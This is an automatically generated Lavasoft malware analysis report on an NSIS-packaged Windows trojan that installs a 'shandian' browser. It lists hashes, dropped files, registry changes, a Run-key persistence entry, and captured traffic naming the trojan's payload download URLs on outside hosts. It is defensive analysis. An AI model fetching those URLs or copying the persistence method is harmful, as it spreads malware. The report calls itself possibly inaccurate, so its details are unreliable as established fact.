Trojan.NSIS.StartPage_65b966a98f

by malwarelabrobot on June 1st, 2014 in Malware Descriptions.

Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 65b966a98ffe2af8265d8c51986fb1c4
SHA1: 5a4eedaafd7e208ee7223a0fd657e9e53b255d95
SHA256: 2da986882887922b9e6666ad6b31e1408133d24cecbd2eff7ad129d32348cbed
SSDeep: 3072:tgXdZt9P6D3XJwFuPXwm9UpdfVlAqQjpt8udlfzt1sy2jVfXI:te34i2bUnTAqQjpt8GhSysQ
Size: 123703 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Applications Install
Created at: 2009-06-07 00:41:59
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

No processes have been created.

The Trojan injects its code into the following process(es):

%original file name%.exe:1256

File activity

The process %original file name%.exe:1256 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\xID.dll (10 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\闪电浏览器\闪电浏览器.lnk (517 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\闪电浏览器\卸载 闪电浏览器.lnk (675 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\open.ini (669 bytes)
%Program Files%\shandian\Unins.exe (564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F30241_s_0523.exe (18246 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\Md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Desktop\闪电浏览器.lnk (505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\emaaif_70690.exe (13344 bytes)
%Program Files%\shandian\config.ini (194 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsf1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F30241_s_0523.exe (0 bytes)

Registry activity

The process %original file name%.exe:1256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\闪电浏览器]
"DisplayName" = "闪电浏览器 1.1.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\闪电浏览器]
"Publisher" = "а汸ÓÃ.nsi_nsis-2.45_76861_776315"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\闪电浏览器]
"DisplayIcon" = "%Program Files%\shandian\Unins.exe"
"UninstallString" = "%Program Files%\shandian\Unins.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\闪电浏览器]
"DisplayVersion" = "1.1.0.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 A9 7F 4A C8 17 A2 04 FB 3B 70 76 57 1B 01 D3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

To automatically run itself each time Windows is booted, the Trojan adds the following value, pointing to its file, to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"shandian" = "%Program Files%\shandian\shandian.exe"

Dropped PE files

MD5 File path
a7d710e78711d5ab90e4792763241754 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\Md5dll.dll
254f13dfd61c5b7d2119eb2550491e1d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\NSISdl.dll
00a0194c20ee912257df53bfe258ee4a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\System.dll
3a5ed71aa9c6846d95d57235c4c443d7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsu2.tmp\xID.dll
a2820daae8e3494f47b72e0e7db4858f c:\Program Files\shandian\Unins.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: MeinV
Product Name: ?????
Product Version: 1.1.0.0
Legal Copyright: Corporation. All rights reserved.
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.1.0.0
File Description: Installer Application
Comments: http://www.sd.com
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 57344 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 249856 53152 53248 5.05621 28649a2ec7752389a3f79b519752e666

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://stat.huashui.org/stat/?v=1&ac=setup2&name=%original file name%.exe&mac=00-0C-29-FD-55-AD&md5=99be0fe99ecadbf4847eb7bfd64d76d7 112.124.102.171
down.icudi.org 222.186.60.2


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile

Traffic

GET /stat/?v=1&ac=setup2&name=%original file name%.exe&mac=00-0C-29-FD-55-AD&md5=99be0fe99ecadbf4847eb7bfd64d76d7 HTTP/1.0
Host: stat.huashui.org
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Connection: close
Date: Sat, 31 May 2014 09:26:17 GMT
Server: Microsoft-IIS/6.0
Who: ShanIE
Content-Length: 3176
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACSSDCBR=GCKPEGAAOMNIKEFIIDMEJIKO; path=/
Cache-control: private
..[s]..s=0..[Page1_1]..Task=down..Desc=..........Hint=..........Exe=F3
0241_s_0523.exe..URL=hXXp://down.icudi.org:99/F30241_s_0523.rar..reg=H
KLM\SOFTWARE\Baidu\BaiduSd\InstallDir..[Page1_2]..Task=down..Desc=....
......Hint=..........Exe=emaaif_70690.exe..URL=hXXp://down.icudi.org:9
9/emaaif_70690.rar..reg=HKLM\SOFTWARE\Baidu\BaiduAn\InstallDir..[Page1
_3]..Task=down..Desc=......Hint=......Exe=kuping_b_54282.exe..URL=http
://down.icudi.org:99/kuping_b_54282.rar..reg=HKCU\Software\Kuping\Inst
allPath..[Page1_4]..Task=down..Desc=..........Hint=..........Exe=pczh_
98_2.exe..URL=hXXp://down.icudi.org:99/pczh_98_2.rar..reg=HKLM\SOFTWAR
E\Microsoft\Windows\CurrentVersion\App Paths\Ainqngz3.9.exe\..[Page1_5
]..Task=down..Desc=........Hint=........Exe=-8853_1_mvy.exe..URL=http:
//down.icudi.org:99/-8853_1_mvy.rar..reg=HKLM\SOFTWARE\Mnying\Mnyingfi
ledir..[Page1_6]..Task=down..Desc=...... ..Hint=........Exe=yxku_s[106
].exe..URL=hXXp://down.icudi.org:99/yxku_s[106].rar..reg=HKCU\Software
\yxkuBox\InstallPath..[Page1_7]..Task=down..Desc=......Hint=......Exe=
xkss_50041.exe..URL=hXXp://down.icudi.org:99/xkss_50041.rar..reg=HKCU\
Software\xuankusoso\InstallMode..[Page1_9]..Task=down..Desc=....FM..Hi
nt=....FM..Exe=setup_3128.exe..URL=hXXp://down.icudi.org:99/setup_3128
.rar..reg=HKLM\SOFTWARE\YYMusic3\rd..[Page1_11]..Task=down..Desc=.....
.....Hint=..........Exe=BaiduPlayerNetSetup_284.exe..URL=hXXp://down.i
cudi.org:99/BaiduPlayerNetSetup_284.rar..reg=HKLM\SOFTWARE\MozillaPlug
ins\@baidu.com/npxbdyy\Path..[Page1_12]..Task=down..Desc=.........

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

Strings from dumps

%original file name%.exe_1256:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
http://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu2.tmp
open.ini
.reloc
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
.vN {
nsu2.tmp
.exe&mac=00-0C-29-FD-55-AD&md5=99be0fe99ecadbf4847eb7bfd64d76d7
1.1.0.0
//down.icudi.org:99/emaaif_70690.rar
%original file name%.exe
c:\%original file name%.exe
%Program Files%\shandian
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
emaaif_70690.exe
http://down.icudi.org:99/emaaif_70690.rar
,Wc%c
%SM"3
I.rHUJr
he.BFY^
Nullsoft Install System v2.45
%Documents and Settings%\%current user%\Desktop\
http://www.sd.com
1.1.0.0

%original file name%.exe_1256_rwx_10004000_00001000:

callback%d


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\xID.dll (10 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\闪电浏览器\闪电浏览器.lnk (517 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\NSISdl.dll (14 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\闪电浏览器\卸载 闪电浏览器.lnk (675 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\open.ini (669 bytes)
    %Program Files%\shandian\Unins.exe (564 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\F30241_s_0523.exe (18246 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\Md5dll.dll (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Desktop\闪电浏览器.lnk (505 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\emaaif_70690.exe (13344 bytes)
    %Program Files%\shandian\config.ini (194 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "shandian" = "%Program Files%\shandian\shandian.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
